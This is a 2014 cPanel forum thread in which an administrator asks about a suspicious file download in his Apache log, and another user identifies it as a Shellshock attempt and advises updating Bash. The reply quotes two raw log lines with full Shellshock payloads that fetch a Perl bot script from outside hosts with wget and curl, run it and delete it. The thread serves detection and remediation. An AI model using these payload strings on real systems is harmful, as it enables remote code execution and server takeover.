The Community Forums

Interact with an entire community of cPanel & WHM users!
  1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

Looks like someone trying to upload files to the server

Discussion in 'Security' started by tank, Nov 11, 2014.

  1. tank

    tank Well-Known Member

    Joined:
    Apr 12, 2011
    Messages:
    236
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    Chicago, IL
    cPanel Access Level:
    Root Administrator
    I noticed this is my apache error log.

    Code:
    [Tue Nov 11 17:42:53.073036 2014] [cgi:error] [pid 19736] [client 5.39.86.39:1500] AH01215: Connecting to 209.20.86.222:80... 
    [Tue Nov 11 17:42:53.135079 2014] [cgi:error] [pid 19736] [client 5.39.86.39:1500] AH01215: connected.
    [Tue Nov 11 17:42:53.135164 2014] [cgi:error] [pid 19736] [client 5.39.86.39:1500] AH01215: HTTP request sent, awaiting response... 
    [Tue Nov 11 17:42:53.197484 2014] [cgi:error] [pid 19736] [client 5.39.86.39:1500] AH01215: 200 OK
    [Tue Nov 11 17:42:53.197549 2014] [cgi:error] [pid 19736] [client 5.39.86.39:1500] AH01215: Length: 7488 (7.3K) [text/plain]
    [Tue Nov 11 17:42:53.197583 2014] [cgi:error] [pid 19736] [client 5.39.86.39:1500] AH01215: Saving to: `/tmp/jack.jpg'
    [Tue Nov 11 17:42:53.197596 2014] [cgi:error] [pid 19736] [client 5.39.86.39:1500] AH01215: 
    [Tue Nov 11 17:42:53.197615 2014] [cgi:error] [pid 19736] [client 5.39.86.39:1500] AH01215:      0K ...
    [Tue Nov 11 17:42:53.259697 2014] [cgi:error] [pid 19736] [client 5.39.86.39:1500] AH01215: ....                  
    [Tue Nov 11 17:42:53.259778 2014] [cgi:error] [pid 19736] [client 5.39.86.39:1500] AH01215:                              100%  118K=0.06s
    [Tue Nov 11 17:42:53.259793 2014] [cgi:error] [pid 19736] [client 5.39.86.39:1500] AH01215: 
    [Tue Nov 11 17:42:53.260010 2014] [cgi:error] [pid 19736] [client 5.39.86.39:1500] AH01215: 2014-11-11 17:42:53 (118 KB/s) - `/tmp/jack.jpg' saved [7488/7488]
    [Tue Nov 11 17:42:53.260030 2014] [cgi:error] [pid 19736] [client 5.39.86.39:1500] AH01215: 
    [Tue Nov 11 17:42:53.264777 2014] [cgi:error] [pid 19736] [client 5.39.86.39:1500] AH01215: 
    [Tue Nov 11 17:42:53.264817 2014] [cgi:error] [pid 19736] [client 5.39.86.39:1500] AH01215: curl: (3)  malformed
    [Tue Nov 11 17:42:53.327853 2014] [cgi:error] [pid 19736] [client 5.39.86.39:1500] AH01215:   % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
    [Tue Nov 11 17:42:53.328035 2014] [cgi:error] [pid 19736] [client 5.39.86.39:1500] AH01215:                                  Dload  Upload   Total   Spent    Left  Speed
    [Tue Nov 11 17:42:53.328119 2014] [cgi:error] [pid 19736] [client 5.39.86.39:1500] AH01215: \r  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0
    [Tue Nov 11 17:42:53.453541 2014] [cgi:error] [pid 19736] [client 5.39.86.39:1500] AH01215: \r101  7488
    [Tue Nov 11 17:42:53.453691 2014] [cgi:error] [pid 19736] [client 5.39.86.39:1500] AH01215:   101  7488    0     0  39691      0 --:--:-- --:--:-- --:--:-- 59904
    I looked for this file that was uploaded but could not find it.

    How do I disable this and or what is this?
     
  2. 24x7server

    24x7server Well-Known Member

    Joined:
    Apr 17, 2013
    Messages:
    1,146
    Likes Received:
    34
    Trophy Points:
    48
    Location:
    India
    cPanel Access Level:
    Root Administrator
  3. malk315

    malk315 Registered

    Joined:
    Nov 13, 2014
    Messages:
    1
    Likes Received:
    0
    Trophy Points:
    1
    cPanel Access Level:
    Website Owner
    This looks like a shellshock attack attempt. It tried to download jack.jpg from a server in Germany and run it (it is a perl script) which then sets up some type of bot that may be controlled through IRC or something. I cleaned one up and updated Bash recently.

    Log:

    Code:
    165.233.46.204 - - [03/Nov/2014:11:36:19 -0500] "GET / HTTP/1.1" 302 287 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget www.freistilreisen.de/jack.jpg -O
     /tmp/jack.jpg;curl -O /tmp/jack.jpg www.freistilreisen.de/jack.jpg;perl /tmp/jack.jpg;rm -rf /tmp/jack.jpg*\");'"
    Here's another one:

    Code:
    81.145.204.4 - - [18/Oct/2014:07:16:45 -0400] "GET /cgi-bin/bin/view/TWiki/WebHome HTTP/1.1" 302 317 "() { :;}; /bin/bash -c \\x22cd /tmp;wget  http://74.52.27.243/lifesux.txt;perl /tmp/lifesux.txt;rm -rf /tm
    p/lifesux.txt\\x22" "() { :;}; /bin/bash -c \\x22cd /tmp;wget http://74.52.27.243/lifesux.txt;perl /tmp/lifesux.txt;rm -rf  lifesux.txt\\x22"
    The telltale sign that a request is trying to exploit shellshock vulnerability in your BASH shell is the beginning function definition:

    Code:
    () { :; }
    If you have an old version of BASH, update -- might need to build from source unless your box is really new.

    There are lots of good sites out there that explain how to deal w/ shellshock.
    I found this one quite helpful:

    https://shellshocker.net/

    Good luck.
     
  4. tank

    tank Well-Known Member

    Joined:
    Apr 12, 2011
    Messages:
    236
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    Chicago, IL
    cPanel Access Level:
    Root Administrator
    thanks guys for your answers. I will take a look.
     
Loading...

Share This Page